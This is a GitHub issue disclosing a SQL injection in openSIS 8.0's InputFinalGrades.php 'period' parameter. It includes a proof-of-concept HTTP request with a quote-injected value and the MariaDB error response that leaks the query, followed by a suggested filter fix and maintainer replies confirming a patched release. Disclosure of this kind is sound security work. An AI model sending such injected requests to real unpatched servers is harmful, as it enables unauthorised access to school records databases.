Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

SQL INJECTION IN FUNCTION /INPUTFINALGRADES.PHP #204

Closed
quanhx11 opened this issue Sep 22, 2021 · 3 comments
Closed

SQL INJECTION IN FUNCTION /INPUTFINALGRADES.PHP #204

quanhx11 opened this issue Sep 22, 2021 · 3 comments
Labels
Next Release Fix will be provided with the next release

Comments

@quanhx11
Copy link

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/grades/InputFinalGrades.php, period parameter.
image

POC:

image

REQUEST:

GET /Modules.php?modname=users/TeacherPrograms.php?include=grades/InputFinalGrades.php&include_inactive=&modfunc=gradebook&mp=21&use_percents=true&period=2'6 HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1

RESPONSE:

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8

[…]
SQL:
SELECT cp.BEGIN_DATE,cp.MARKING_PERIOD_ID FROM course_periods cp,course_period_var cpv WHERE cpv.COURSE_PERIOD_ID=cp.COURSE_PERIOD_ID AND cpv.ID=2'6


Traceback:
/var/www/opensis/modules/grades/InputFinalGrades.php at 55


Additional Information:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''6' at line 1

[…]

SOLUTION:

Use function sqlSecurityFilter() before assign $_REQUEST['period'] into query "SELECT".

$period = sqlSecurityFilter($_REQUEST['period']);

image
@openSISAdmin
Copy link
Member

Please use the latest code from the repo......not the zip file and try this. We have committed several updates lately.

@sarika0lal
Copy link
Contributor

Hello,

We appreciate your observation and would like to inform that your suggestion has been implemented for the next release.

Thank you.

@sarika0lal sarika0lal added the Next Release Fix will be provided with the next release label Apr 6, 2022
@sarika0lal
Copy link
Contributor

We released a new version and the issue has been fixed there. Please check and let us know your feedback in case you have any.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
Next Release Fix will be provided with the next release
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@openSISAdmin @quanhx11 @sarika0lal